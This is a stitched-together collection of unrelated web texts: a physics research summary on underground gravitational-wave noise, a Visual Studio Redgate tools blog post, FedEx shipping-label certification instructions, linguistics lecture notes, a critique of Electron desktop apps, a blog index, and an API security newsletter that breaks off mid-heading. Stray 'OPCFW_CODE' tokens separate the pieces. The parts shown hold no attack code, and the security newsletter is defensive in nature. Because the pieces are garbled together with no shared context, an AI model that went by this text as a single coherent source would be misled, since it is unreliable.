Studying gravity-gradient noise at Homestake. Seismic noise and fluctuations in the local gravitational field (called Newtonian, or gravity gradient noise) are large enough to limit the sensitivity of gravitational-wave detectors that operate on the surface. For this reason, it is likely that the next generation of detectors will be built underground. We have operated an array of 25 seismometers in and above the Homestake mine, South Dakota and collected data for nearly two years. We used the data to understand the behavior of seismic waves underground and their composition. The results of this study will be folded into the design of the next generation of gravitational-wave detectors.
Instrumental development. The sensitivity of (terrestrial) gravitational-wave interferometers at low frequencies (below ~10 Hz) are limited in part by seismic noise. However, it is desirable to extend the operating band of detectors to lower frequencies (0.1-10 Hz), where a large number of gravitational-wave sources is expected to be. We are studying the feasibility of new techniques to limit seismic noise at low frequencies. We are also developing quantum tunneling accelerometers that may allow easier tracking of the seismic noise at or near gravitational wave detectors.
|
OPCFW_CODE
|
Visual Studio 2017 now includes Redgate Tools to increase productivity while doing database development work. I use the VS Enterprise edition at work, so am pretty excited to leverage the productivity benefits of these tools, within Visual Studio IDE itself.
You can install Redgate Data Tools from the Visual Studio 2017 Installer.
SQL Search is available across all the editions of Visual Studio – Community, Professional and Enterprise.
SQL Prompt Core and ReadyRoll Core is available in only the Enterprise edition of Visual Studio.
- SQL Prompt Core is a great productivity tool while working with SQL Server and provides you with advanced intellisense and code completion features.
- SQL Search is another productivity tool which helps you to find SQL objects faster inside the database.
- ReadyRoll Core helps you to develop, source control and automatically deploy databases in Visual Studio using migration scripts.
One of the foremost prerequisite for Continuous Integration is to keep all the project artifacts under version control – not just the source code but also the database objects, tests, build and deployment scripts.
SQL Server Data Tools in Visual Studio transforms the traditional database development by allowing you to view, design, maintain and refactor database objects. I have been using SSDT Database projects for my database development work for a long time now, and it is interesting to see another option included in Visual Studio now in the form of ReadyRoll.
I played around with ReadyRoll, and fundamentally it seems pretty much similar to SSDT. Both these tools will help you do database development work and tie up with your CI/CD Pipeline for automated deployments.
The big difference between them is that SSDT uses State-driven approach whereas ReadyRoll uses a Migration-driven approach.
When you open the Visual Studio 2017 Installer, you can install the Redgate Data Tools through the ‘Data storage and processing’ workload —
You can also install it through the Individual Components tab —
Once you select the Redgate Tools and update your Visual Studio install, you should see a popup with the installation progress —
In my upcoming blogs, I will be describing my experience working on these tools. Overall I feel that these tools are a great addition to Visual Studio IDE and will enhance developer productivity.
Related Posts on Visual Studio 2017 –
Automatic Performance monitoring of Extensions in Visual Studio 2017
Find all References in Visual Studio 2017
Fixing Build Errors with Database Unit Test Projects in Visual Studio 2017
Lightweight Solution Load in Visual Studio 2017
New Installation Experience with Visual Studio 2017 RC
Windows Workflow is now an individual component in VS 2017 RC
Categories: C#, Visual Studio, Visual Studio 2017
Leave a Reply
|
OPCFW_CODE
|
Table of Contents
Updated by Colin
FedEx Web Services is the FedEx service which allows ShipStream to communicate with FedEx to create shipping labels and more. Every shipper must use their own FedEx Account and Web Services access keys. This article assumes that you already have a business account with FedEx.
This article will help guide you through the FedEx Web Services Label Certification Guide and ShipStream will make it as easy as possible to generate the test labels needed to pass certification.
Obtain Test Credentials (Step 1 and 2)
The first step is to obtain a Test Key (not a Production Key) from the FedEx Developer Resource Center.
- Login to the FedEx Developer Resource Center and click FedEx Web Services > Develop and Test.
- Navigate to "Obtain Test Key" and click "Get Your Test Key".
- Complete the wizard and check your email for the credentials.
- Add a Shipping Account into ShipStream using these credentials. It is recommended to add them to a separate group such as "Test" so they are easy to choose in the next steps. Be sure to select "Test Environment: Yes" when adding the account.
You should now be able to generate FedEx test labels as if they were real labels using this account. The test labels will be clearly identified by the text in the second address line: **TEST LABEL - DO NOT SHIP**
Register for Move to Production (Step 3)
- Return to the FedEx Developer Resource Center and click FedEx Web Services > Move to Production.
- Click "Get Production Key" and complete the registration process.
Fill out the Label Cover Sheet (Step 4)
The last page of the FedEx Web Services Label Certification Guide has a single-page cover sheet. Print this on paper or to a separate PDF document and fill out the form for later use.
Generate and submit test labels to the Label Analysis Group (Step 5)
You are required to generate and print physical labels for the FedEx services you will be using, which is the last question on the Label Cover Sheet. ShipStream automates this process for you so that you can generate all of these labels in just a few easy steps:
- Login to ShipStream and navigate to System > Shipping Accounts.
- Click the Shipping Account Group that you added your Test Key credentials to in the first step.
- Click the Shipping Account that has your FedEx Test Key credentials.
- Click "Generate Certification Labels" and fill out the form:
- Select the Store Name (if there are multiple stores) that the new production account belongs to.
- Provide a Recipient Name that will appear on the labels.
- Provide a Product SKU for a fully configured product that belongs to the Merchant of the selected Store. The weight and dimensions of this product will be used as the package weight and dimensions so it should have realistic dimensions for shipping, such as 3lb and 10x8x6 in. Weights and dimensions that are too low or too high may cause validation errors.
- Select all of the Services for which you would like to generate a test label. Note, the (Saturday Delivery) options may not be possible to use on all days of the week depending on the origin and destination. If you do not submit a Saturday Delivery label you should still be able to use Saturday Delivery.
- Click "Submit". If you have scanned a Label printer the labels will be sent to the printer, otherwise they will be downloaded in a PDF file which you can then print using Adobe Reader or your PDF printer of choice.
Label Evaluation (Step 6)
Now that you have the labels you must either scan them using a scanner or mail them to FedEx with your cover sheet. For the fastest response, scan them and email them along with the cover sheet to firstname.lastname@example.org. The Bar Code Analysis group will evaluate the labels and either accept or reject them. To move to the next step they must first be accepted.
Inspect your labels and the scanned document for problems like label alignment, elements overlapping the watermark on the thermal labels, or poor quality that may be related to the print software scaling the print job (the bars of the barcodes should be crisp).
Enable the Application (Step 7 and 8)
Your FedEx Production credentials are now ready to be added to ShipStream with "Test Environment: No" and so long as ShipStream is properly configured to resolve the correct Shipping Account you are ready to begin generating production labels!
|
OPCFW_CODE
|
Language SubsystemsPhonology - sound system
Elementary sound units and rules for combining them (certain sound combinations are not allowed)
Phonemes - sound categories (e.g., 'b') with different pronunciations (allophones)Morphology - word system
Words and rules for combining them
Morphemes - minimal meaning units
Free - stand alone
Bound - do not stand alone; must be combined with others
Inflectional - provide additional information (e.g., 's' for n > 1)
Derivational - alter meaning of morpheme (e.g., un-; ly for changing adj. -> adv.
Sample rules (in English): add 's' for nouns to indicate plural (but irregular nouns)
Semantics - meaning systemLexical - word meaning (e.g., referent)
Compositional - meaning of word combinations (phrases/sentences). Can't be determined by combining lexical meaning (Blind Venetian = Venetian Blind).
Speaker meaning - what a particular speaker means with a remark in a particular context (= sentence meaning; context dependent).
Syntax - word combination system
relates sound to meaning. Word order conveys meaning (especially in English)
treated at sentence level; existence of syntax for larger stretches of language (discourse; conversation) is not clear.Pragmatics - system of language use
variations in production and comprehension as a function of context (broadly defined).
Catch-all category (everything not covered above).
Focus on speaker meaning; both intended and unintended.
Topics = politeness, conversational structure, conversational inference (recognition of intention)Summary: Sounds are combined (phonetics) to form words with a particular sense and reference (morphology) that can be combined to create a grammatical sentence (syntax) with a particular meaning (semantics) that a speaker can use to accomplish a particular goal in some context (pragmatics).
Issue: Independence of subsystems. How and to what extent do these subsystems interact?In some theories (e.g., Chomsky) they are viewed as relatively autonomous.
-"Colorless green ideas sleep furiously" - grammatical but meaningless (so, syntax and semantics are separate)However, clearly dependencies exist. Some examples:
1. Morphology and phonology: word superiority effect; letters identified more quickly if part of a word.
2. Phonology (e.g., intonation) - pragmatics: rising intonation produces a question interpretation.
3. Pragmatics and syntax: pragmatic constraints on insertion of 'please' in conventional indirect requests.
Language DisciplinesLinguistics (theoretical; e.g., Chomsky)
Describe structural properties of language (e.g., syntactic rules)
Evidence = linguistic intuitions
In general, focus on language competence (what ideal, decontextualized, hearer/speaker knows in order to use language). Separate from language performance (actual use).
In general, takes an individualistic perspective (how single speaker constructs/interprets utterance apart from others who are involved in the act).
Part of competence may involve factors normally associated with performance.
This issue is dealt with in pragmatics, applied linguistics, etc.Psycholinguistics -
examination of psychological processes involved in language use. How do people produce, comprehend, and acquire language.
Evidence = experimental
Greater emphasis on performance; but still somewhat asocial, Individualized, idealized sentences, etc.Sociolinguistics -
social dimension of language use
Examination (often empirical) of how language use (hence performance) is affected by social features (e.g., dialect/code switching; politeness; address form shifts)Additional disciplines
- philosophy (semantics), artificial intelligence (simulation of language use), social psychology (interpersonal aspects of language; underpinnings of social thought)Levels of analysis - language use can be examined at different levels
Computational - Description of hypothetical rules (e.g., Chomsky/competence)
Representational - How rules are represented and use (e.g., psycholinguistics)
Implementational - Physical performance of activity (e.g., neurolinguistics)
Design Features of Language (from Hockett)Features of language that may distinguish it from other forms of communication.
2.Broadcast transmission and Directional Reception
Overhearers - impacts use3.Rapid fading
Cognitive consequence; must plan while receiving (conversation processing differs from text processing)4. Interchangability
users can be both senders and receivers5. Total/complete feedback
have access to what they're producing6. Specialization
energetic consequences are irrelevant; sound waves per se are irrelevant in terms of conveying meaning; e.g., volume is irrelevant in terms of meaning (true?)
meaningful symbols; associative link between communicative elements and features of the world (including relationship betweennn words; function word).
(Internal representation required?)8. Arbitrary
no natural relationship between communicative elements and their referents (signals rather than signs)9. Disreteness
elements have either/or quality. Not analog. Related to arbitrariness and specialization.10. Displacement
communicated information can be removed in time/space from actual communication.11. Productivity
open system; discrete elements can be comined in infinite variety of ways. Syntax allows for iteration and recursion and hence productivity (even though elements are discreete); continuous system wouldn't require syntax.12. Duality of patterning
Discrete elements are hierarchically organized; primitive elements are meaningless; it is the hierarchical organization that allows for meaning. Phonemes -> morphemes; Morphemes -> Sentences (meaning not morphemes combined). Sentences -> Discourse.13.Traditional transmission.
Language is taught (indirectly) and learned.Some possible additions:
Possible to communicate about communication
(e.g., this course)
possible to lie and deceive
Reflexive intention (intention that is intended to be recognized)
|
OPCFW_CODE
|
Electron seems to be an awesome technology. The amount of apps currently being built using electron is a testament of that. But if you see the most successful electron apps, they are being supported by engineers solely focused on optimising electron and making sure that the app doesn’t end up crashing the customer’s machines.
Imagine a startup just starting their first POC or just getting off the ground. At this point all you want to focus on is the problem you are trying to solve. You absolutely don’t have resources or time to solve challenges which are not the core of your business.
Simply put if you have enough resources to focus completely on optimising the desktop experience, electron might just work out for you. But that isn’t the case for most of the startups I have met. They are majorly front end guys unaware of systems complexity when dealing with high RAM utilisation or minimising inter process communication.
In our case, we took on a challenge of building an enterprise SaaS product using electron with 5 front end ninjas. We had enough knowledge of how to build awesome apps using JS, React, CSS and UX magic. We were completely unaware and unequipped for the challenges we were about to face building an electron app.
In this article I am not going to be listing down the pros of using electron. I will rather be focusing on the cons of electron and any desktop app in general. This is a list of challenges i have listed down from our experiences in building our Enterprise SaaS app in Electron.
Inter-Process Communication (IPC)
We build our app considering being able to work offline as our primary goal. We used RxDB as our database and all information was synced between our servers and the local database every few minutes. This relied heavily on the users system to be able to write data really fast. But as it turns out a lot of our users have crappy systems where disk read writes are extremely slow ( 5400 rpm hard drives!). This lead to the systems starting to experience performance issues.
Consider a 4GB RAM machine with a dual core processor with chrome, outlook, excel and an electron app open. Needless to say, the systems almost crashed. It became impossible for any user to get work done.
Later we optimised the read/writes, moved the writes to background processes, reduced the requirement on offline with storing only essential data etc. But it took a lot of months of focused optimisation and refactoring which we could have spent concentration on the product and the problem.
Electron runs a chromium process and renders your JS and HTML in the window. Which is like running another chrome instance in a machine which may not be able to give you enough resources.
Chromium hogs memory like crazy.
This was never a secret. Being able to realise that fact we pushed our customers to opt for better machines, but considering the list of frictions we already had in on-boarding enterprises this just increased it more.
Slower Release Cycles
When you are starting up, you need speed. You need to release as quickly as possible and there will also be a lots of production bugs popping up which need to be solved even faster.
But considering the fact that the smallest electron app we could come up with is 100 MB and each bug fix was a release which auto updated by downloading the same again on each users machine, it seriously slowed our release cycle.
We ended up delaying release of bug fixes because users complained on how many times they have to update our app. Plus in some organisations, the end users didn’t have the permissions to install new apps. Which meant they didn’t have permissions for updates too. This meant the IT guys in organisations having to update in every users machine leaving them frustrated.
When a windows user installs a desktop application, there is an underlying bias present. They have gotten used to lightning fast interfaces powered by simple .Net applications and locally hosted servers.
Presenting them with an electron app built with JS and HTML ( which is significantly slower than the counterpart) created a mismatch in expectations.
There isn’t much available for testing electron apps for performance. The renderer process can be tested using standard frameworks and chrome profiler. But if you wish to test the app with IPC messages and main process memory consumption when interacting with a particular screen, you need to develop something custom.
This sadly also meant debugging performance issues in electron to be a seriously tough task.
We have spent countless number of hours debugging performance issues happening in the system, connecting to remote machines and trying to analyse what exactly is eating this system up…..
Electron might be the way to go for you only if you have already achieved product-market fit. There is a big benefit in having a computer screen open up an the user seeing your app’s icon right there.
Please be aware of the potential problems of desktop and specifically Electron apps pose.
|
OPCFW_CODE
|
Data Scientists, as well as Data Engineers, might be different job titles, though the core title roles have existed for some time now.
With the growth of big data, brand new roles started showing up in corporations as well as in research centers – specifically, Data Scientists as well as Data Engineers.
Here is an introduction to the roles of the Data Analyst, BI Developer, Data Scientist as well as Data Engineer.
Data Analyst: Data Analysts have actually experienced data experts who query and process data, provide visualization, summarize, and report data. They have got a powerful awareness of how you can use existing methods and tools to resolve a problem, as well as assist individuals from across the business to understand specific queries with ad hoc accounts and charts.
Nevertheless, they’re not likely to contend with examining big data, neither are they usually likely to have the mathematical or maybe research history to create new algorithms for particular issues.
Skills: Data Analysts have to use a baseline understanding of several primary skills: stats, data wrangling, data visualization, and exploratory data evaluation.
Tools: Microsoft Excel, Tableau, Microsoft Access, SQL, SAS Miner, SAS, SPSS Modeler, SPSS, SSAS.
Business Intelligence Developers:
Business Intelligence Developers are actually data experts that interact a lot more closely with inner stakeholders to recognize the reporting requires, and next to gather requirements, style, and develop BI and reporting ways for the business. They’ve to design, create as well as support new and existing data warehouses, cubes, ETL packages, dashboards as well as analytical reports.
Furthermore, they work with directories, each multidimensional and relational, and must have good SQL development abilities to incorporate information from numerous resources. They normally use all of these abilities to satisfy the enterprise-wide self-service needs. BI Developers are usually not likely to conduct data analysis.
Skills: ETL, building accounts, OLAP, cubes, net intelligence and company objects layout.
Tools: Tableau, SSAS, SQL, dashboard tools, SSIS as well as SPSS Modeler.
Data Engineers are actually the data experts that put together the “big data” infrastructure being analyzed by Data Scientists. They’re software engineers that design, build, incorporate information and data from numerous online resources, and control big data. Next, they create complicated queries on that, be sure that it’s very easily accessible, works easily, and their aim is actually optimizing the overall performance of their company’s great data ecosystem.
They may additionally rub a few ETL (Extract, Transform as well as Load) in addition to serious datasets and create great data warehouses that may be utilized for reporting or maybe analysis by data scientists. Beyond that, simply because Data Engineers concentrate more people on the layout and architecture, they’re usually not likely to learn some machine learning or maybe analytics for great data.
Skills: Hadoop, SQL, NoSQL, Data streaming, Pig, Hive, MapReduce, and programming.
Tools: DashDB, MySQL, MongoDB, Cassandra
A data scientist is actually the alchemist of the 21st century: somebody that could flip raw details into purified insights. Data scientists apply statistics, analytic approaches and machine learning to solve serious business issues. The primary function of theirs is helping businesses convert large volumes of their big data into actionable and valuable insights.
Indeed, data science isn’t always a brand new area per se, though it may be viewed as an advanced amount of data analysis which is actually pushed as well as automated by machine learning as well as computer science. In another term, around comparability with’ data analysts’, along with data analytical abilities, Data Scientists are actually anticipated to have strong programming expertise, and ability to develop new algorithms, and manage big data.
Additionally, Data Scientists are usually likely to interpret and eloquently provide the outcomes of the findings, by visualization strategies, creating data science apps, or perhaps narrating stories that are interesting about the solutions to the data of their (business) difficulties.
The problem-solving abilities of a data scientist call for an understanding of new and traditional data analysis techniques to construct statistical models or even find patterns in data. For instance, developing a recommendation engine, predicting the inventory sector, diagnosing clients depending on the similarity of theirs, or perhaps discovering the patterns of fraudulent transactions.
Data Scientists might occasionally be provided with big data without a specific business issue in the brain. With this situation, the interesting Data Scientist is actually anticipated to check out the data, come up with the proper questions, as well as give findings that are interesting! This’s challenging because, to evaluate the data, a tough Data Scientist must have a really wide understanding of various methods in deep machine learning, data mining, big data infrastructures, and statistics.
They need to have experience dealing with a variety of datasets of various sizes and shapes, as well as be in a position to run the algorithms of his on large-size data efficiently and effectively, which usually means staying up-to-date with all of the latest cutting edge technologies. This’s the reason it’s crucial to find out computer science fundamentals as well as programming, such as practical experience with databases and languages (big/small) systems.
Skills: Python, deep learning, machine learning, Hadoop, Apache Spark, Scala, R, and statistics.
Tools: Data Science Experience, Jupyter, and also RStudio.
|
OPCFW_CODE
|
There seems to be some instability in the dragging code. It’s doesn’t quite do what I want, so I’m tracking along with the object, using a blank object. My dragging object is right on the mouse. The built-in source bounces all over the place, almost as if it is trying to have physics? It’s hard to even hit a small target, it’s so jumpy.
I’m not doing anything funny, just startdragging()
I’ve never had problems with it - does the juce demo’s dragging page work ok for you? If so, what are you doing differently?
Probably that other object that I’m tracking. Looking at the dragcontainer code, it looks like it often checks what cursor is under the mouse, instead of remembering what it was dragging. The obvious assumption is that the drag surrogate is there.
Since I’m also dragging along another object, it sometimes probably gets the wrong answer.
But obviously, I’m engaged in a horrendous bodge. I had to get something out last night. What’s really missing, for me, is a dragging event that I can respond to (in dragcontainer). It’s notable to me that Jucer doesn’t use this system because it needs to do more.
So I’d like to request that extra, optional methods get added so we can track a drag. In my case, I’m drawing a connection from a fixed point to the cursor, and trying to snap it to a target if there is one.
Maybe you could just point to where that event should get fired?
Sounds like a bodge and a half. Doesn’t DragAndDropTarget::itemDragMove give you enough info?
Yes, bodgy bodgy bodge, to be exact. Promised a version with a start on a feature.
Not unless I start making fake drop targets to cover everything else - which I could do, I suppose. It would mean making my d&dcontainer also a target and track that way.
Don’t you think that some other methods are needed? It seems that throughout Jucer it didn’t meet your needs either.
What do you think?
The drag and drop stuff really isn’t intended for that kind of specialised interaction - it’s just meant for old-fashioned dragging and dropping of discrete things like files. Not sure which bit of the jucer you’re referring to, but I can’t think of anything in there where having a more flexible drag+drop would have helped.
No, I can see that it’s unusual. I went to d&dcontainer so I could get the drop target without crunching all the positions to see what component I’m over.
The ‘Component at mouse’ static method doesn’t help since I’m dragging a component around right on the mouse, and I don’t see a component at (mouse +/i x) or a way to get all components under the mouse, in z order, and going though all the components to check would be cheesy.
What do you recommend? Could a dragMouse event be added to d&dcontainer? Is there a better component at mouse position trick?
You could look in d+dcontainer for the best trick for finding the component that you’re over. I’ll have a think about adding some feedback to the container, maybe a virtual method that you could override.
|
OPCFW_CODE
|
In this article, I’m going to talk about a software named Chocolatey. This app is basically a package manager for windows. A package manager is an app that helps you to install multiple apps at the same time.
You might have come across such things if you’ve ever been to Linux. There you just have to type some commands like “sudo apt-get install google-chrome” and the corresponding app will be installed without bothering you. no clicking next — next — I agree to the terms and freaking conditions etc.
So how do I install Chocolatey:
You can either go to chocolatey.org or you can type the following command in PowerShell and it will be installed in your system.
Set-ExecutionPolicy Bypass -Scope Process -Force; [System.Net.ServicePointManager]::SecurityProtocol = [System.Net.ServicePointManager]::SecurityProtocol -bor 3072; iex ((New-Object System.Net.WebClient).DownloadString(‘https://chocolatey.org/install.ps1’))
Now the stage is set up. All you need to do is perform now.
So, run the command prompt with administrator and type “choco install dropbox” if you want to install dropbox and so on.
You may run into some errors like when I wanted to install Iobit Uninstaller I wrote “choco install Iobit Uninstaller” and it didn’t work. So, I visited their site and head over to the package section where I searched for that app and found out that the command should have been “choc install iobit-uninstaller”. This also happened in the case of LibreOffice. The intended command was “choco install libreoffice-fresh” (how would I have known!)
If you don’t want any obstacles you can type like “choco install potplayer -y”. This added -y will prevent the reconfirmation dialogue to appear, otherwise it will ask you every time “are you sure you want to install the app?” So, add this -y to avoid this sort of situation.
This one is a reward for reading this far. So, all I discussed so far tells you to install apps one by one without obstructions but what if we can take this a step further?
Let me assume you already installed chocolatey. Now think all the apps that you want to install then type their corresponding commands line by line in a text file. Then save that as a .bat file. You can give whatever name you want to that file only remember to add .bat at the end.
Now run the file as admin and all the apps that you wrote the commands of will be installed one after another smoothly while you can relax and read the newspaper (if you’re into that or you can read a storybook-like me)
|
OPCFW_CODE
|
Articles, News and Tutorials for web development, programming as a crafstmanship. For a specific category see the Menu.
Showcase how single letter keys and compression can shave a bit off your AWS bill.
Setup your own personal and free VPN with a few Docker commands.
Intro to profiling Go apps or packages. To keep it short I will only focus on the computational optimizations.
Because static blogs are popular again, I want to raise awareness of more powerful ways to use static generated content.
How to avoid bugs and vulnerabilities using defensive programming.
A simple, straightforward, pragmatic tutorial for back-end engineers.
Do not stale or return the wrong result, rather tell your caller that something is wrong.
A free, fast and easy to setup web health checker using AWS Lambda.
What exactly a developer mentor does? Good question, I am struggling myself to find out. I wrote about what exactly am I doing.
I wrote about my latest pet-project: emoji-compress.com and what I have learned by doing it.
Delve into the epic journey of developing a next-gen persistent space simulator. Post for: devs, designers, devops, Q&A and writers.
A summary of more than 3h of panels based on software written for NASA space exploration missions.
The terms backend and frontend may mean different things, depending on your project/team.
Let's explore how did the paradigm changed over the years when talking about back-end web applications.
Learn why are we using encoding & decoding functions and what are the differences from Encryption, Hashing, Minification & Obfuscation.
Making peace with the Ghosts of Code Past while delivering new features.
Hierarchical Heap is a very efficient Priority Queue O(log n/k) for large data sets.
How am I learning Go as my new main language, what resources & techniques am I using?
The technical details and the new mindset needed to make the switch.
A/B tests will try to make spaghetti from your clean code. Learn from my mistakes so you don’t repeat them.
A few thoughts about “the zone”, brakes, tasks and notifications.
I am lazy but I care about the most precious currency we have: time ⏰. That being said I want to share some tips that improved my…
Writing O(1) high performance data structures, in order to learn Go.
A fine list of open source or free tools and online services any software engineer/QA/devops can use.
Later edit (2018): I ended up using http://meteor-up.com/ with a custom VM in AWS/Google cloud. The costs were too high with a managed…
Every game needs some kind of input control from the user, usually we need to let the user interact with our unity objects directly, by…
Bledea Georgescu Adrian © 2020
|
OPCFW_CODE
|
I have worked with a professor on a project where I produced some results from running experiments and analysing the data, now the professor is asking a new student to redo my experiments with the promise of adding the student's name to the publication we already submitted to a conference and is currently under review.
I wasn't told of the reason why a new student was brought to the project but if I have to guess it would be to validate the results.
I feel that the new student shouldn't be added as an author as he is repeating what I have already done. Is my feeling correct/justified? Should I approach the professor with this concern? Or should I keep it to myself?
I understand what you are going through. Your best shot is to discuss this with your advisor! But, you need to consider the following;
- I do not know your field (although you have used computer-scinece as a tag), but in some fields, conference papers are not that important. I'm not saying that adding a new author should be fine! All what I'm saying that as long as your name is 1st, or 2nd author, you should be fine. (Personally, I would not be fine if the new guy's name came before mine in this specific scenario). If conference papers are weighted heavily in your field (i.e., computer science), that is a different story and you may need to talk to your advisor for clarifications.
- It also depends on the topic, if the topic is specific (i.e., cutting edge technology) rather than general (i.e., literature review), then adding an additional author may cause irritation on your part and this need to be addressed with the advisor (again).
- You do not know the whole story! What is the point of adding a new guy? Why redo your experiments? If it is due to funding/proposal/politics, you need to consider the bigger picture.
- In general, you need to learn to cooperate! The sooner the better. You do not end up working with the people you like or the same people over and over again! My advisor would make two students work on a topic that is remotely related to both of them just to teach them how to cooperate. Then, he publishes two papers (where he switches the students names between 1st and 2nd). For instance, one paper would be on an experimental approach to solve a problem where student A is the first author. the 2nd paper will be on analytical/numerical approach to be validated against the experimental work where student B is the first author.
P.S. When I discussed collaboration in point 4, I do not mean that your advisor should add somebody in a paper you have been working on for sometime (or has an outcome of your direct research/thesis). But, rather for "networking", "motivation", "learning" and "brainstorming" aspects.
|
OPCFW_CODE
|
Add func for creating a namespace by passing in the entire ObjectMeta to allow more configuration (setting labels)
This PR aims to close #575.
I saw this issue had been hanging around for a while and I'll need it for some upcoming testing!
As discussed in the issue, I added a new func CreateNamespaceWithMetadataE for backwards compatibility. It will accept the Namespace ObjectMeta as an argument instead of the Namespace name so further configuration can be done (adding labels).
Let me know how this looks!
Thanks
Here is the test output
$ go test --tags=kubeall -run TestNamespace
TestNamespaces 2021-01-03T22:48:16-05:00 client.go:33: Configuring kubectl using config file /Users/caseybuto/.kube/config with context
TestNamespaceWithLabels 2021-01-03T22:48:16-05:00 client.go:33: Configuring kubectl using config file /Users/caseybuto/.kube/config with context
TestNamespaces 2021-01-03T22:48:16-05:00 client.go:33: Configuring kubectl using config file /Users/caseybuto/.kube/config with context
TestNamespaceWithLabels 2021-01-03T22:48:16-05:00 client.go:33: Configuring kubectl using config file /Users/caseybuto/.kube/config with context
TestNamespaces 2021-01-03T22:48:16-05:00 client.go:33: Configuring kubectl using config file /Users/caseybuto/.kube/config with context
TestNamespaceWithLabels 2021-01-03T22:48:16-05:00 client.go:33: Configuring kubectl using config file /Users/caseybuto/.kube/config with context
TestNamespaces 2021-01-03T22:48:16-05:00 client.go:33: Configuring kubectl using config file /Users/caseybuto/.kube/config with context
TestNamespaceWithLabels 2021-01-03T22:48:16-05:00 client.go:33: Configuring kubectl using config file /Users/caseybuto/.kube/config with context
PASS
ok github.com/gruntwork-io/terratest/modules/k8s 1.923s
@brikis98 I appreciate you reviewing this, next contribution will better!
@brikis98 I appreciate you reviewing this, next contribution will better!
I also rebased this branch with master to pull test updates
I also rebased this branch with master to pull test updates
Thanks! I'll kick off tests shortly.
🤦 We have yet another unrelated build failure that just snuck in. Working on a fix. https://github.com/gruntwork-io/terratest/pull/775. Sorry for all the back and forth.
no worries at all!
OK, https://github.com/gruntwork-io/terratest/pull/775 is now merged. Could you rebase and I can kick off tests again?
OK, #775 is now merged. Could you rebase and I can kick off tests again?
done!
Thanks! Kicking off tests now.
https://github.com/gruntwork-io/terratest/releases/tag/v0.32.3
|
GITHUB_ARCHIVE
|
I have checked out the documentation, but am still stumped. If someone could explain it to me like I am a three year old, I would love it.
I am using CircleCl in this repo:
Along with a few others. If someone could fork then pull with the correct changes and explain it, I would love it.
I get this warning:
It looks like we couldn’t infer test settings for your project. Refer to our “Setting your build up manually” document to get started. It should only take a few minutes.
I checked out the documentation, but it doesn’t help.
The github repository you linked to doesn’t contain any way to test it. CircleCI does automatically look for a few different ways to test you project, for instance if you use NPM it will check for a test script inside your package.json.
If you don’t want to run tests you can add this to your circle.yml:
- echo "no tests"
What do you want to use circleci for? Testing? Deploying?
To tell the truth, I am a little shaky on what to use CircleCl for too!
What do you suggest?
Okay, I have this at the moment
There was an error while parsing your circle.yml: deployment section :release must contain one of heroku:, commands:, or codedeploy:
Action failed: Configure the build
I currently have this in my circle.yml:
Any suggestions on what I should do?
I found the problem above, it was because it was trying to refer to a Heroku server.
Are there any templates that I can use?
We need to know what you are trying to do before we can give any help. Why are you using CircleCI in the first place? What did you plan on doing with it?
Typically CircleCI is used to do Continuous Integration and Continuous Deployment.
The general idea is to test all changes that you are making to your code base. You can accomplish this with:
Software Testing in general is a huge topic with tons of concepts.
If your tests pass, then you can deploy your code to development, staging, production, etc… the specific way that you do this depends on what type of infrastructure you are deploying too. I think that Heroku is easiest to understand and our default integration is simple to set up.
How does CircleCI help you
Now that we have a basic context of what CI and CD is, we can talk about how CircleCI fits into this picture. CircleCI integrates with your version control system (in this case GitHub) and automatically runs a series of steps every time that we detect a change to your repository (when you push commits).
A CircleCI build consists of a series of steps which are generally:
We have some inference that can detect these automatically if you are using best practices for standard projects. You can also configure each of these phases manually.
I hope this clears things up a bit. Good luck in your CI journey
|
OPCFW_CODE
|
This week, we have an article on the value of using a developer portal for APIs, a guide from Dana Epp in finding “dark data” in an API, and an update from PortSwigger on their Web Security Academy resources for learning more about API security. We also have an update on the API vulnerabilities reported in the Ray AI framework last week and news on the latest webinar from 42Crunch. Finally, as it is the season for such things, I make a few predictions for API security in 2024.
This is the final APISecurity.io newsletter for 2023. We wish all subscribers happy holidays and a prosperous New Year and look forward to welcoming you back with issue 237 on the 11th of January 2024!
Article: Using a developer portal for APIs
The first article this week comes courtesy of The New Stack and covers the important topic of developer portals for APIs. A developer portal can be thought of as a library where you, your developers, and your customers can find and use your organization’s APIs. Without a developer portal, it can be challenging to keep track of your APIs, and this can lead to a duplication in effort as teams recreate existing APIs or a lack of control and governance over your API inventory.
From an API security perspective, most readers will be aware of the challenges an unmanaged inventory poses. Knowing your complete inventory is necessary to quantify the risk presented by your APIs. Many organizations typically have two or three times more APIs than they realize. By using a developer portal as an inventory tracking tool, security teams can keep track of their API assets, introduce governance over the introduction of new APIs, and gracefully manage the deprecation of obsolete APIs.
The author identifies several other benefits of API developer portals, namely:
- Troubleshooting and maintenance: a comprehensive catalog can help developers and operations teams understand the connectivity of coupled APIs and aid in troubleshooting in the event of outages or performance issues.
- Support: the catalog can be useful to support teams in identifying APIs and their respective owners, which is important when allocating support teams to support an incident.
- Onboarding and training: help onboarding new team members understand the overall API topology during their onboarding and induction.
- Ongoing development: provides information to developers about the existence of APIs already available in their organization.
- Strategic planning: allows the leadership teams to consolidate their inventory and plan their strategy going forward regarding new APIs and deprecation of obsolete APIs.
This article features an in-depth look at the Port developer portal platform, which looks very comprehensive and offers a totally free tier.
Guide: Finding “dark data” in an API
Our top contributor in 2023 is undoubtedly Dana Epp, and it’s appropriate that we feature him in our Christmas issue. This time, he’s discussing the critical topic of “dark data” within APIs.
Dana’s working definition of “dark data” is “as any data collected and stored by an organization but not generally used for any practical purpose.” This data can be any from internal storage systems such as databases or various analytics and business intelligence tools. Think of it as metadata that may leak confidential information about your primary data assets, allowing an attacker to infer various useful insights.
Dana calls out the significant concerns around the leakage of such dark data, namely:
- Security risks: data may include sensitive information such as usernames or other PII.
- Compliance issues: many industries have very strict data protection and privacy requirements, and even such seemingly innocuous data may constitute a violation.
- Insights and opportunities: dark data can provide an attacker with insights into how to attack your organization via its business logic or application flows.
The impacts of dark data leakage (and, more generally, excessive information exposure) are captured in the OWASP API Security Top 10 as the third most significant concern affecting APIs in the category API3:2023 Broken Object Property Level Authorization.
The recommendation for an API builder or defender is to use a tightly constrained OpenAPI definition that specifies the minimum data to satisfy the API’s functionality. Use continuous testing to ensure that your APIs meet this contract, and use runtime protection to ensure APIs do not leak additional data in production.
Tools: Web Security Academy resources for API security
PortSwigger’s Web Security Academy is an evergreen resource for learning about web application security and API security. The academy provides excellent guided lessons and hands-on laboratories to allow users to explore topics of interest. In my opinion, their academy is one of the best learning resources for security topics.
Recently, they have published guidance on learning resources specific to the OWASP API Security Top 10. This resource is great for anyone (attacker or defender) wanting to learn more about API security.
Vulnerability: API vulnerability found in Ray AI framework
